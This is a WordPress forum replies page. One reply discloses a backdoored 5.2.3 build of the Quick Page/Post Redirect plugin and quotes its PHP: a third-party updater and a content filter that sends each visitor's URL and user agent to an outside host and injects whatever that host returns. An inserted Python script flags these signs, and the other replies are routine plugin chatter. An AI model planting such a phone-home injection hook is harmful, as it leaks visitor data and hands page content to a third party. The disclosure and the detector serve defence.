Forum Replies Created

Viewing 7 replies - 1 through 7 (of 7 total)
  • Thread Starter Znuff

    (@znuff)

    It should allow all arbitrary HTML code in there, no reason to baby-sit the users.

    Thread Starter Znuff

    (@znuff)

    You didn’t understand what I wrote.

    This needs to be emphasized and the plugin download disabled.

    I just noticed the behavior on a 2+ year old install.

    Specifically:

    – The version of this plugin on www.remarpro.com is 5.2.2
    – The version installed in my WordPress is 5.2.3

    The 5.2.3 version contains a few “extra” things:

    1. There’s a directory called updater that uses https://github.com/YahnisElsts/plugin-update-checker

    2. The main file contains an update function:

    
    // update functionality
    require  dirname(__FILE__).'/updater/plugin-update-checker.php';
    $myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
      //'https://anadnet.com/updates/plugin.json',
      'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin',
      __FILE__, //Full path to the main plugin file or functions.php.
      'quick-pagepost-redirect-plugin'
    );
    

    This function updates the plugin from the Author’s website, and the JSON data you get from them returns: "version": "5.2.3",.

    3. The main file now contains a “phone home” function:

    
    add_filter( 'the_content', array( $this, 'filter_the_content_in_the_main_loop' ), -1 );
    
    function filter_the_content_in_the_main_loop( $content ) {
        if (( is_single() || is_singular() || is_page() ) && (!is_user_logged_in()) && is_main_query()  ){
            if ($this->ppr_pro === '1' ){
              if (!defined('CREDIT')) {
              $ctx=stream_context_create(array('http'=>array('timeout' => 3)));
              try{
                $credit=@file_get_contents('https://w.anadnet.com/bro/3/'.$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] .'QQQ'. urlencode($_SERVER['HTTP_USER_AGENT']).'QQQEND', false, $ctx);
                } catch (Exception $e) {
                }
    
                return $credit . $content;
                define('CREDIT', 'c');
              }
            }
        }
    
        return $content;
      }
    

    This will submit ANY URL accessed on your website to the author’s page, and it will return $credit back, together with the $content.

    This has the potential to inject content in any of your pages, if the plugin author (or, better said – whoever controls that website) decides to.

    I’m not sure how the version 5.2.3 got installed in my wp install, as it’s been running for a few years now.
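An added example, not part of the original post or the plugin's code: a static check for the three signs the post describes (an installed version newer than the directory's, an update checker pointed at a non-directory host, and a remote fetch whose URL carries visitor request data). The sample source is constructed and abridged from the quoted snippets; the trusted-host list and all function names are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample, abridged from the two snippets quoted in the post.
SAMPLE_PLUGIN = r"""<?php
/* Version: 5.2.3 */
require dirname(__FILE__).'/updater/plugin-update-checker.php';
$myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
  //'https://anadnet.com/updates/plugin.json',
  'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin',
  __FILE__,
  'quick-pagepost-redirect-plugin'
);
$credit=@file_get_contents('https://w.anadnet.com/bro/3/'.$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'], false, $ctx);
return $credit . $content;
"""

TRUSTED_UPDATE_HOSTS = {"api.wordpress.org", "downloads.wordpress.org"}  # assumption: site policy
UPDATER_CALL = re.compile(r"buildUpdateChecker\s*\((.*?)\)\s*;", re.S)
FETCH_CALL = re.compile(r"\b(file_get_contents|wp_remote_get|wp_remote_post|curl_init)\s*\(([^;]*);")
URL = re.compile(r"""['"](https?://[^'"]+)['"]""")
SERVER_VAR = re.compile(r"""\$_SERVER\[['"](\w+)['"]\]""")

def strip_line_comments(php):
    """Drop whole-line // comments so commented-out URLs are not reported."""
    return "\n".join(l for l in php.splitlines() if not l.lstrip().startswith("//"))

def audit_plugin_source(php):
    """Return findings for off-directory updaters and fetches that leak request data."""
    findings, code = [], strip_line_comments(php)
    for m in UPDATER_CALL.finditer(code):
        for url in URL.findall(m.group(1)):
            host = urlparse(url).hostname
            if host not in TRUSTED_UPDATE_HOSTS:
                findings.append(("third-party-updater", host))
    for m in FETCH_CALL.finditer(code):
        urls = URL.findall(m.group(2))
        leaked = sorted(set(SERVER_VAR.findall(m.group(2))))
        if urls and leaked:  # remote URL built from visitor request data
            findings.append(("visitor-data-in-remote-fetch", urlparse(urls[0]).hostname, leaked))
    return findings

def newer_than_directory(php, directory_version):
    """True when the plugin header version exceeds the version the directory lists."""
    m = re.search(r"Version:\s*(\d+(?:\.\d+)*)", php)
    as_tuple = lambda v: tuple(int(p) for p in v.split("."))
    return bool(m) and as_tuple(m.group(1)) > as_tuple(directory_version)

if __name__ == "__main__":
    print(audit_plugin_source(SAMPLE_PLUGIN), newer_than_directory(SAMPLE_PLUGIN, "5.2.2"))
```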

    I have actually made a change to my local copy of WP_Fragment_Cache that can clear individual cache entries.

    I’ve added a new parameter to ::output(), that will store cache fragments with “absolute key names” – this will store fragments without the usual file name/path and line number, instead it will store it using the actual provided key name.

    Then I added a ::remove() function that will take an absolute key name and will remove the key from the cache.

    This is useful to hook into your theme for specific events (ie: when a comment is added, a post is changed etc.), without having to purge the whole cache (why update the whole cache when just a specific fragment changes?).

    I would commit it to the main code, but I’m afraid the quality of my documentation is not on par with mariuspass’.

    I’d be more of a fan of a CLI version… but I’m a server guy, so take that with a grain of salt.

    Plugin Author Znuff

    (@znuff)

    It’s only for Images, as the name implies “Image”Lightbox.

    More info you can get at https://osvaldas.info/image-lightbox-responsive-touch-friendly

    @cmscritic: I’ve been on the devel branch with 2.8 for ages and I never had problems. People should check their idiotic plugins/themes before talking crap around here.

    Not buggy, move along.
